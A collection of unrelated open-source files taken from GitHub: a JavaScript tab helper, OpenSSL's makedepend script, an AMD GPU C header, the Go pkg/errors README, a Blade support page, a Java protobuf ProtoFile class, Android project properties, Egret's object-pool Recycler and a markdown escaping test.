*/ isDirty: function() { var me = this; var dirty = false; me.getTab().items.each(function(item) { if(Ext.isFunction(item.isDirty)) dirty = item.isDirty(); if(dirty) // Abort immediatelly return false; }); return dirty; }, /** * Set values for fields in this tab in bulk. * @param values The values to set in the tab of an object hash. * @return void */ setValues: function(values) { var me = this; me.getTab().items.each(function(item) { if(Ext.isFunction(item.setValues)) item.setValues(values); }); }, /** * Returns the fields in this tab as an object with key/value pairs. * @return An array of key/value pairs. */ getValues: function() { var me = this; var values = {}; me.getTab().items.each(function(item) { if(Ext.isFunction(item.getValues)) { var v = item.getValues(); Ext.applyEx(values, v); } }); return values; }, /** * Method that is called when the 'Reset' button is pressed. The reset * will be forwarded to the active tab. * @param this The window itself. */ onResetButton: function() { var me = this; var activeTab = me.getTab().getActiveTab(); if(Ext.isFunction(activeTab.reset)) activeTab.reset(); } });
{ "pile_set_name": "Github" }
#!/bin/sh # Do a makedepend, only leave out the standard headers # Written by Ben Laurie <[email protected]> 19 Jan 1999 TOP=$1 shift if [ "$1" = "-MD" ]; then shift MAKEDEPEND=$1 shift fi if [ "$MAKEDEPEND" = "" ]; then MAKEDEPEND=makedepend; fi cp Makefile Makefile.save # fake the presence of Kerberos touch $TOP/krb5.h if ${MAKEDEPEND} --version 2>&1 | grep "clang" > /dev/null || echo $MAKEDEPEND | grep "gcc" > /dev/null; then args="" while [ $# -gt 0 ]; do if [ "$1" != "--" ]; then args="$args $1"; fi shift done sed -e '/^# DO NOT DELETE.*/,$d' < Makefile > Makefile.tmp echo '# DO NOT DELETE THIS LINE -- make depend depends on it.' >> Makefile.tmp ${MAKEDEPEND} -Werror -D OPENSSL_DOING_MAKEDEPEND -M $args >> Makefile.tmp || exit 1 ${PERL} $TOP/util/clean-depend.pl < Makefile.tmp > Makefile.new RC=$? rm -f Makefile.tmp else ${MAKEDEPEND} -D OPENSSL_DOING_MAKEDEPEND $@ && \ ${PERL} $TOP/util/clean-depend.pl < Makefile > Makefile.new RC=$? fi mv Makefile.new Makefile # unfake the presence of Kerberos rm $TOP/krb5.h exit $RC
{ "pile_set_name": "Github" }
/* * Copyright 2014 Advanced Micro Devices, Inc. * * Permission is hereby granted, free of charge, to any person obtaining a * copy of this software and associated documentation files (the "Software"), * to deal in the Software without restriction, including without limitation * the rights to use, copy, modify, merge, publish, distribute, sublicense, * and/or sell copies of the Software, and to permit persons to whom the * Software is furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE COPYRIGHT HOLDER(S) OR AUTHOR(S) BE LIABLE FOR ANY CLAIM, DAMAGES OR * OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, * ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR * OTHER DEALINGS IN THE SOFTWARE. * */ #ifndef __AMDGPU_CONNECTORS_H__ #define __AMDGPU_CONNECTORS_H__ struct edid *amdgpu_connector_edid(struct drm_connector *connector); void amdgpu_connector_hotplug(struct drm_connector *connector); int amdgpu_connector_get_monitor_bpc(struct drm_connector *connector); u16 amdgpu_connector_encoder_get_dp_bridge_encoder_id(struct drm_connector *connector); bool amdgpu_connector_is_dp12_capable(struct drm_connector *connector); void amdgpu_connector_add(struct amdgpu_device *adev, uint32_t connector_id, uint32_t supported_device, int connector_type, struct amdgpu_i2c_bus_rec *i2c_bus, uint16_t connector_object_id, struct amdgpu_hpd *hpd, struct amdgpu_router *router); #endif
{ "pile_set_name": "Github" }
# errors [![Travis-CI](https://travis-ci.org/pkg/errors.svg)](https://travis-ci.org/pkg/errors) [![AppVeyor](https://ci.appveyor.com/api/projects/status/b98mptawhudj53ep/branch/master?svg=true)](https://ci.appveyor.com/project/davecheney/errors/branch/master) [![GoDoc](https://godoc.org/github.com/pkg/errors?status.svg)](http://godoc.org/github.com/pkg/errors) [![Report card](https://goreportcard.com/badge/github.com/pkg/errors)](https://goreportcard.com/report/github.com/pkg/errors) [![Sourcegraph](https://sourcegraph.com/github.com/pkg/errors/-/badge.svg)](https://sourcegraph.com/github.com/pkg/errors?badge) Package errors provides simple error handling primitives. `go get github.com/pkg/errors` The traditional error handling idiom in Go is roughly akin to ```go if err != nil { return err } ``` which applied recursively up the call stack results in error reports without context or debugging information. The errors package allows programmers to add context to the failure path in their code in a way that does not destroy the original value of the error. ## Adding context to an error The errors.Wrap function returns a new error that adds context to the original error. For example ```go _, err := ioutil.ReadAll(r) if err != nil { return errors.Wrap(err, "read failed") } ``` ## Retrieving the cause of an error Using `errors.Wrap` constructs a stack of errors, adding context to the preceding error. Depending on the nature of the error it may be necessary to reverse the operation of errors.Wrap to retrieve the original error for inspection. Any error value which implements this interface can be inspected by `errors.Cause`. ```go type causer interface { Cause() error } ``` `errors.Cause` will recursively retrieve the topmost error which does not implement `causer`, which is assumed to be the original cause. 
For example: ```go switch err := errors.Cause(err).(type) { case *MyError: // handle specifically default: // unknown error } ``` [Read the package documentation for more information](https://godoc.org/github.com/pkg/errors). ## Roadmap With the upcoming [Go2 error proposals](https://go.googlesource.com/proposal/+/master/design/go2draft.md) this package is moving into maintenance mode. The roadmap for a 1.0 release is as follows: - 0.9. Remove pre Go 1.9 and Go 1.10 support, address outstanding pull requests (if possible) - 1.0. Final release. ## Contributing Because of the Go2 errors changes, this package is not accepting proposals for new functionality. With that said, we welcome pull requests, bug fixes and issue reports. Before sending a PR, please discuss your change by raising an issue. ## License BSD-2-Clause
{ "pile_set_name": "Github" }
@extends('core::layout') @section('content') <div class="container-fluid"> <div class="row"> <div class="col-md-12"> <div class="row"> <div class="col-md-6"> <h3><i class="icon-support"></i> Suporte</h3> </div> </div> <div class="row"> <div class="col-md-12"> <hr> </div> </div> <div class="row"> <div class="col-md-12"> <h4><strong>Problemas com a sua Assinatura ou Site?</strong></h4> Informe-nos através do email: <strong><a href="mailto:[email protected]">[email protected]</a></strong> </div> <div class="col-md-12">&nbsp;</div> <div class="col-md-12"> <h4><strong>Tem dúvidas sobre o conteúdo e precisa de um help?</strong></h4> Temos um canal exclusivo para trocar ideias: <br> <strong><a href="https://telegram.me/codecasters" target="_blank">https://telegram.me/codecasters</a></strong> </div> </div> </div> </div> </div> @endsection
{ "pile_set_name": "Github" }
// Copyright 2013 Square, Inc. package com.squareup.protoparser; import com.google.auto.value.AutoValue; import com.squareup.protoparser.Utils.Nullable; import java.util.ArrayList; import java.util.Collection; import java.util.List; import static com.squareup.protoparser.Utils.checkNotNull; import static com.squareup.protoparser.Utils.immutableCopyOf; /** A single {@code .proto} file. */ @AutoValue public abstract class ProtoFile { static final int MIN_TAG_VALUE = 1; static final int MAX_TAG_VALUE = (1 << 29) - 1; // 536,870,911 private static final int RESERVED_TAG_VALUE_START = 19000; private static final int RESERVED_TAG_VALUE_END = 19999; /** Syntax version. */ public enum Syntax { PROTO_2("proto2"), PROTO_3("proto3"); private final String name; Syntax(String name) { this.name = name; } } /** True if the supplied value is in the valid tag range and not reserved. */ static boolean isValidTag(int value) { return (value >= MIN_TAG_VALUE && value < RESERVED_TAG_VALUE_START) || (value > RESERVED_TAG_VALUE_END && value <= MAX_TAG_VALUE); } public static Builder builder(String filePath) { return new Builder(checkNotNull(filePath, "filePath")); } ProtoFile() { } public abstract String filePath(); @Nullable public abstract String packageName(); @Nullable public abstract Syntax syntax(); public abstract List<String> dependencies(); public abstract List<String> publicDependencies(); public abstract List<TypeElement> typeElements(); public abstract List<ServiceElement> services(); public abstract List<ExtendElement> extendDeclarations(); public abstract List<OptionElement> options(); public final String toSchema() { StringBuilder builder = new StringBuilder(); if (!filePath().isEmpty()) { builder.append("// ").append(filePath()).append('\n'); } if (packageName() != null) { builder.append("package ").append(packageName()).append(";\n"); } if (syntax() != null) { builder.append("syntax \"").append(syntax().name).append("\";\n"); } if (!dependencies().isEmpty() || 
!publicDependencies().isEmpty()) { builder.append('\n'); for (String dependency : dependencies()) { builder.append("import \"").append(dependency).append("\";\n"); } for (String publicDependency : publicDependencies()) { builder.append("import public \"").append(publicDependency).append("\";\n"); } } if (!options().isEmpty()) { builder.append('\n'); for (OptionElement option : options()) { builder.append(option.toSchemaDeclaration()); } } if (!typeElements().isEmpty()) { builder.append('\n'); for (TypeElement typeElement : typeElements()) { builder.append(typeElement.toSchema()); } } if (!extendDeclarations().isEmpty()) { builder.append('\n'); for (ExtendElement extendDeclaration : extendDeclarations()) { builder.append(extendDeclaration.toSchema()); } } if (!services().isEmpty()) { builder.append('\n'); for (ServiceElement service : services()) { builder.append(service.toSchema()); } } return builder.toString(); } public static final class Builder { private final String filePath; private String packageName; private Syntax syntax; private final List<String> dependencies = new ArrayList<>(); private final List<String> publicDependencies = new ArrayList<>(); private final List<TypeElement> types = new ArrayList<>(); private final List<ServiceElement> services = new ArrayList<>(); private final List<ExtendElement> extendDeclarations = new ArrayList<>(); private final List<OptionElement> options = new ArrayList<>(); Builder(String filePath) { this.filePath = filePath; } public Builder packageName(String packageName) { this.packageName = checkNotNull(packageName, "packageName"); return this; } public Builder syntax(Syntax syntax) { this.syntax = checkNotNull(syntax, "syntax"); return this; } public Builder addDependency(String dependency) { dependencies.add(checkNotNull(dependency, "dependency")); return this; } public Builder addDependencies(Collection<String> dependencies) { for (String dependency : checkNotNull(dependencies, "dependencies")) { 
addDependency(dependency); } return this; } public Builder addPublicDependency(String dependency) { publicDependencies.add(checkNotNull(dependency, "dependency")); return this; } public Builder addPublicDependencies(Collection<String> dependencies) { for (String dependency : checkNotNull(dependencies, "dependencies")) { addPublicDependency(dependency); } return this; } public Builder addType(TypeElement type) { types.add(checkNotNull(type, "type")); return this; } public Builder addTypes(Collection<TypeElement> types) { for (TypeElement type : checkNotNull(types, "types")) { addType(type); } return this; } public Builder addService(ServiceElement service) { services.add(checkNotNull(service, "service")); return this; } public Builder addServices(Collection<ServiceElement> services) { for (ServiceElement service : checkNotNull(services, "services")) { addService(service); } return this; } public Builder addExtendDeclaration(ExtendElement extend) { extendDeclarations.add(checkNotNull(extend, "extend")); return this; } public Builder addExtendDeclarations(Collection<ExtendElement> extendDeclarations) { for (ExtendElement extendDeclaration : checkNotNull(extendDeclarations, "extendDeclarations")) { addExtendDeclaration(extendDeclaration); } return this; } public Builder addOption(OptionElement option) { options.add(checkNotNull(option, "option")); return this; } public Builder addOptions(Collection<OptionElement> options) { for (OptionElement option : checkNotNull(options, "options")) { addOption(option); } return this; } public ProtoFile build() { return new AutoValue_ProtoFile(filePath, packageName, syntax, immutableCopyOf(dependencies), immutableCopyOf(publicDependencies), immutableCopyOf(types), immutableCopyOf(services), immutableCopyOf(extendDeclarations), immutableCopyOf(options)); } } }
{ "pile_set_name": "Github" }
# This file is automatically generated by Android Tools. # Do not modify this file -- YOUR CHANGES WILL BE ERASED! # # This file must be checked in Version Control Systems. # # To customize properties used by the Ant build system use, # "ant.properties", and override values to adapt the script to your # project structure. # Project target. target=android-17
{ "pile_set_name": "Github" }
////////////////////////////////////////////////////////////////////////////////////// // // Copyright (c) 2014-present, Egret Technology. // All rights reserved. // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are met: // // * Redistributions of source code must retain the above copyright // notice, this list of conditions and the following disclaimer. // * Redistributions in binary form must reproduce the above copyright // notice, this list of conditions and the following disclaimer in the // documentation and/or other materials provided with the distribution. // * Neither the name of the Egret nor the // names of its contributors may be used to endorse or promote products // derived from this software without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY EGRET AND CONTRIBUTORS "AS IS" AND ANY EXPRESS // OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES // OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. // IN NO EVENT SHALL EGRET AND CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, // INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT // LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;LOSS OF USE, DATA, // OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF // LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING // NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, // EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. // ////////////////////////////////////////////////////////////////////////////////////// namespace egret { /** * Tool class for object cache repeat use, which can be used to construct an object pool. Objects are automatically recycled after a certain duration. 
* @version Egret 2.4 * @platform Web,Native * @includeExample extension/game/utils/Recycler.ts * @private * @language en_US */ /** * 对象缓存复用工具类,可用于构建对象池,一段时间后会自动回收对象。 * @version Egret 2.4 * @platform Web,Native * @includeExample extension/game/utils/Recycler.ts * @private * @language zh_CN */ export class Recycler extends HashObject{ /** * Create an egret.Recycler object * @param autoDisposeTime {number} Number of frames when objects are destroyed automatically. Default value: 300 * @version Egret 2.4 * @platform Web,Native * @language en_US */ /** * 创建一个 egret.Recycler 对象 * @param autoDisposeTime {number} 多少帧后自动销毁对象,默认值300 * @version Egret 2.4 * @platform Web,Native * @language zh_CN */ public constructor(autoDisposeTime:number = 300){ super(); if(autoDisposeTime<1) autoDisposeTime = 1; this.autoDisposeTime = autoDisposeTime; this.frameCount = 0; } /** * @private */ public static _callBackList:any[] = []; public static $init():void { ticker.$startTick(Recycler.onUpdate, Recycler); } public static onUpdate(timeStamp:number):boolean { let list = Recycler._callBackList; for (let i = list.length - 1; i >= 0; i--) { list[i].$checkFrame(); } return false; } /** * @private * 多少帧后自动销毁对象。 */ private autoDisposeTime:number; /** * @private */ private frameCount:number; /** * @private * */ public $checkFrame():void{ this.frameCount--; if(this.frameCount<=0){ this.dispose(); } } /** * @private */ private objectPool:any[] = []; /** * @private */ private _length:number = 0; /** * Number of cached objects" * @version Egret 2.4 * @platform Web,Native * @language en_US */ /** * 缓存的对象数量 * @version Egret 2.4 * @platform Web,Native * @language zh_CN */ public get length():number{ return this._length; } /** * Cache an object for repeat use * @param object {any} The object to be cached * @version Egret 2.4 * @platform Web,Native * @language en_US */ /** * 缓存一个对象以复用 * @param object {any} 需要缓存的对象 * @version Egret 2.4 * @platform Web,Native * @language zh_CN */ public push(object:any):void{ 
let pool:any[] = this.objectPool; if(pool.indexOf(object)==-1){ pool.push(object); if (object.__recycle) { object.__recycle(); } this._length++; if(this.frameCount==0){ this.frameCount = this.autoDisposeTime; Recycler._callBackList.push(this); } } } /** * Obtain a cached object * @returns {any} The obtained cached object * @version Egret 2.4 * @platform Web,Native * @language en_US */ /** * 获取一个缓存的对象 * @returns {any} 获得的缓存对象 * @version Egret 2.4 * @platform Web,Native * @language zh_CN */ public pop():any{ if(this._length==0) return null; this._length--; return this.objectPool.pop(); } /** * Immediately clear all cached objects. * @version Egret 2.4 * @platform Web,Native * @language en_US */ /** * 立即清空所有缓存的对象。 * @version Egret 2.4 * @platform Web,Native * @language zh_CN */ public dispose():void{ if(this._length>0){ this.objectPool = []; this._length = 0; } this.frameCount = 0; let list:any[] = Recycler._callBackList; let index:number = list.indexOf(this); if(index!=-1){ list.splice(index,1); } } } Recycler.$init(); }
{ "pile_set_name": "Github" }
nice [video](http://www.youtube.com/video\-on\e). Nice\-vide\o star \* nice ![video](http://www.youtube.com/video\-on\e). Nice\-vide\o star \* [video]: http://www.youtube.com/video\-on\e [video] and <http://www.youtube.com/video\-on\e> and <m\a\[email protected]>
{ "pile_set_name": "Github" }